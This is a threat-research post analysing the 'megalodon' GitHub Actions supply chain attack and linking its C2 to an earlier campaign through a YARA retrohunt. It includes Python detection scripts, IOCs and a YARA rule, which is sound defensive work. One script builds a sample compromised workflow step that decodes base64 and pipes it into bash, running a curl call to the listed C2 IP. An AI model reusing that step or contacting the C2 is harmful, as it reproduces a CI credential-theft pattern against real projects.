Threat Research, May 26, 2026

Researcher's Notebook: Hunting Megalodon Fossils

Analyzing C2 responses from compromised GitHub Actions linked a current threat to an earlier one, showing the value of retrohunting.

Robert Simmons
Hunting Megalodon Fossils

The "megalodon" supply chain attack, which began on approximately May 18, 2026, compromised numerous GitHub Actions workflow YAML files by inserting a base64-encoded malicious script. The C2 used in this campaign was hosted on the IP address 216.126.225[.]129. Analyzing the response content served by the web server on that IP ties the campaign to an earlier attack that used a similar credential stealer script together with a coin miner delivered in a malicious Docker container. Both campaigns connect to a C2 framework that Cisco Talos has identified as NEXUS Listener.

The Script: Malicious GitHub Actions

As reported on X by user @abh1sek, a large number of repositories were compromised: malicious GitHub Actions steps were added to the CI configuration YAML in the form of a base64-encoded script. One example of this script is shown in the following figure.


Figure 1: Malicious GitHub Action with Base64 encoded script

Decoding the base64 reveals the malicious script. The C2 URL is highlighted at the top of the next figure.


Figure 2: Base64-decoded malicious script with C2 URL highlighted
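The decoding step above is easy to automate across a repository's workflow files. The following Python script is an added example, not code from the post or from ReversingLabs: it scans a workflow file for long base64 tokens, decodes them, flags steps that pipe the decoded output straight into a shell, and checks the decoded text against the C2 hosts listed in the post's IOCs. The sample workflow and its decoded content are constructed for the example; the decoded step contains only the megalodon C2 URL from the IOC list, not the real script.

```python
import base64
import binascii
import re
from typing import Dict, List

# Indicators copied from the post's IOC list: the megalodon C2 host and the
# host used by the earlier, related campaign.
KNOWN_C2_HOSTS = ("216.126.225.129", "144.172.116.48")

# A long run of base64 alphabet characters, optionally padded; requiring 40+
# characters keeps version tags and most short tokens out of the results.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# The "decode and pipe straight into a shell" pattern the post describes.
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")

# Constructed sample of what the decoded step contains. Only the C2 URL from
# the post's IOC list is used; this is a stand-in, not the real script.
_DECODED_SAMPLE = (
    "curl -s 'http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=4ny72dgixww6'\n"
)

# Constructed sample workflow file (not a real compromised repository).
SAMPLE_WORKFLOW = "\n".join([
    "name: CI",
    "on: [push]",
    "jobs:",
    "  build:",
    "    runs-on: ubuntu-latest",
    "    steps:",
    "      - uses: actions/checkout@v4",
    "      - name: Set up environment",
    "        run: echo " + base64.b64encode(_DECODED_SAMPLE.encode()).decode()
    + " | base64 -d | bash",
    "      - name: Test",
    "        run: npm test",
    "",
])


def _looks_like_text(data: bytes) -> bool:
    """True when the decoded bytes are mostly printable, i.e. likely a script."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= 0.9


def find_encoded_steps(workflow_text: str) -> List[Dict]:
    """Scan a workflow file line by line for base64 blobs, decode them, and
    report whether each is piped into a shell and which known C2 hosts it names."""
    findings = []
    for line_no, line in enumerate(workflow_text.splitlines(), start=1):
        for token in B64_TOKEN.findall(line):
            try:
                raw = base64.b64decode(token, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64 (e.g. a hex digest or a long path)
            decoded = raw.decode("utf-8", errors="replace") if _looks_like_text(raw) else None
            findings.append({
                "line_no": line_no,
                "decoded": decoded,
                "piped_to_shell": bool(DECODE_TO_SHELL.search(line)),
                "iocs": [h for h in KNOWN_C2_HOSTS if decoded and h in decoded],
            })
    return findings


if __name__ == "__main__":
    for hit in find_encoded_steps(SAMPLE_WORKFLOW):
        print(f"line {hit['line_no']}: shell={hit['piped_to_shell']} iocs={hit['iocs']}")
        print(hit["decoded"])
```

Run it over every file under `.github/workflows/` in a checkout; a step that decodes base64 into a shell is worth a review on its own, and an IOC match on the decoded text is an immediate escalation.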

URL analysis in Spectra Analyze shows the C2 to be hosted on RouterHosting LLC (ASN 14956). The campaign string "megalodon" appears in the query, along with "gh_dump", indicating a GitHub dump.


Figure 3: C2 URL analysis in Spectra Analyze

When the C2 does not receive the request it expects from the malicious script, its response contains help text from the C2 software. This help text can be seen in the following figure.


Figure 4: C2 help text response

Notice that the data exfiltrated from GitHub repos is written to files in a directory named "loot" under the root directory. The next line of the help text contains the same set of query keys as the C2 URL collected from the malicious GitHub Action. That whole line of text can be converted into a YARA hexadecimal string, which avoids the need for escaping.

00000000  50 4f 53 54 20 2f 61 6e 79 20 3f 68 3d 26 6c 3d  |POST /any ?h=&l=|
00000010  26 69 64 3d 26 74 3d 20 20 62 6f 64 79 3d 72 61  |&id=&t=  body=ra|
00000020  77 20 62 79 74 65 73                             |w bytes|

The result is the YARA rule seen in the next figure. This rule is also provided at the end of this blog post.


Figure 5: Megalodon C2 detection YARA rule

Performing a retrohunt in Spectra Analyze reveals similar C2 response content collected two weeks earlier, on May 8. The results of the hunt are shown in the next figure.


Figure 6: YARA retro hunt revealing historical C2 response content
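To show both the text-to-hex conversion described above and the retrohunt it enables, here is an added Python example (not the post's or ReversingLabs' code, and not how Spectra Analyze implements either step): `to_yara_hex` renders the help-text line as a YARA hex string grouped in four-byte words like the post's rule, `build_rule` wraps it in a rule with the same layout, and `retrohunt` looks for the resulting byte pattern in a constructed store of collected response content keyed by network location. The store's contents and the help-text lines around the matched one are made up; the two C2 locations come from the post's IOC list.

```python
import re
from typing import Dict, List

# The help-text line the post turns into a YARA hex string, and the hex body
# of the rule as printed at the end of the post (whitespace normalized).
C2_HELP_LINE = "POST /any ?h=&l=&id=&t=  body=raw bytes"
POST_RULE_HEX = ("{ 504F5354 202F616E 79203F68 3D266C3D 2669643D "
                 "26743D20 20626F64 793D7261 77206279 746573 }")


def to_yara_hex(text: str, group: int = 4) -> str:
    """Render text as a YARA hex string in groups of `group` bytes, so that
    quotes, backslashes and odd whitespace never need escaping."""
    digits = text.encode("utf-8").hex().upper()
    words = [digits[i:i + 2 * group] for i in range(0, len(digits), 2 * group)]
    return "{ " + " ".join(words) + " }"


def build_rule(name: str, hex_body: str, description: str) -> str:
    """Emit a complete rule in the same layout as the post's rule."""
    return "\n".join([
        f"rule {name}",
        "{",
        "    meta:",
        f'        description = "{description}"',
        "    strings:",
        f"        $body = {hex_body}",
        "    condition:",
        "        $body",
        "}",
    ])


def hex_string_to_bytes(hex_body: str) -> bytes:
    """Turn a plain YARA hex string (no wildcards or jumps) back into bytes."""
    return bytes.fromhex(re.sub(r"[{}\s]", "", hex_body))


# Constructed stand-in for a store of collected HTTP response content, keyed by
# the network location it came from. The two C2 locations are the post's IOCs;
# the help text around the matched line and the third host are made up.
COLLECTED_RESPONSES: Dict[str, bytes] = {
    "216.126.225.129:8443": (
        b"listener usage:\n  loot written under /loot\n"
        b"  POST /any ?h=&l=&id=&t=  body=raw bytes\n"
    ),
    "144.172.116.48:8080": (
        b"listener usage:\n  loot written under /loot\n"
        b"  POST /any ?h=&l=&id=&t=  body=raw bytes\n"
    ),
    "203.0.113.10:80": b"<html><body>404 Not Found</body></html>\n",
}


def retrohunt(pattern: bytes, corpus: Dict[str, bytes]) -> List[str]:
    """Return every location whose stored response contains the pattern; this
    is the retrohunt from the post reduced to a substring search over history."""
    return sorted(loc for loc, body in corpus.items() if pattern in body)


if __name__ == "__main__":
    hex_body = to_yara_hex(C2_HELP_LINE)
    print(build_rule("NexusListener_C2_1", hex_body,
                     "Detects NEXUS Listener C2 response content."))
    print(retrohunt(hex_string_to_bytes(hex_body), COLLECTED_RESPONSES))
```

The hex body produced here is identical to the one in the rule at the end of the post, and the hunt over the constructed store returns both C2 locations while leaving the benign 404 response alone; in practice the same pattern is handed to the retrohunt engine rather than matched in Python.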

The Network Locations list shows where this response content was collected from. The next figure shows the related C2 URL from the campaign two weeks earlier; the campaign name embedded in this URL is cp2.hostable[.]com.


Figure 7: Historical C2 URL

An OSINT search for the IP address used by this prior campaign turns up several reports about the activity. These are shown in the following two figures.


Figure 8: Reporting on Reddit about related campaign

Figure 9: Reporting on LinkedIn about related campaign (post by Salah-Eddine El Ouali)

Trusted CI Infrastructure is the Target

The megalodon campaign shows how rapidly large-scale supply chain attacks can spread through trusted CI infrastructure. Pivoting from the malicious GitHub Action payload to the C2 response content and then to historical telemetry connects this activity to an earlier credential theft and cryptomining campaign, which demonstrates the value of retrohunting for linking current threats to prior campaigns and adversary activity.

IOCs

hxxp[://]216[.]126[.]225[.]129:8443?h=megalodon&l=gh_dump&id=4ny72dgixww6
hxxp[://]144[.]172[.]116[.]48:8080/?h=cp2[.]hostable[.]com&l=found&id=94f7511e-08d6-421e-bdc1-d420f4c93d331777695161953
hxxp[://]144[.]172[.]116[.]48:8080/?h=MacBook&id=5BFF69DC-85FD-49E1-9E93-46A77A0A9B331777797917858&l=info
hxxp[://]144[.]172[.]116[.]48:8080/?h=cp2[.]hostable[.]com&id=94f7511e-08d6-421e-bdc1-d420f4c93d331777695161953&l=found
hxxp[://]144[.]172[.]116[.]48:8080/?h=buffalo&l=tokens&id=a49fd31b-bab5-45bb-a4ea-5b233ef5a3db1777797762271
hxxp[://]144[.]172[.]116[.]48:8080/?h=MacBook&l=info&id=5BFF69DC-85FD-49E1-9E93-46A77A0A9B331777797917858

IPs
216[.]126[.]225[.]129
144[.]172[.]116[.]48
144[.]172[.]102[.]88
172[.]86[.]127[.]128
144[.]172[.]112[.]136
144[.]172[.]117[.]112

YARA Rule

rule NexusListener_C2_1
{
    meta:
        author = "Malware Utkonos"
        date = "2026-05-21"
        description = "Detects NEXUS Listener C2 response content."
    strings:
        $body = { 504F5354 202F616E 79203F68 3D266C3D 2669643D
                  26743D20 20626F64 793D7261 77206279 746573 }
    condition:
        $body
}
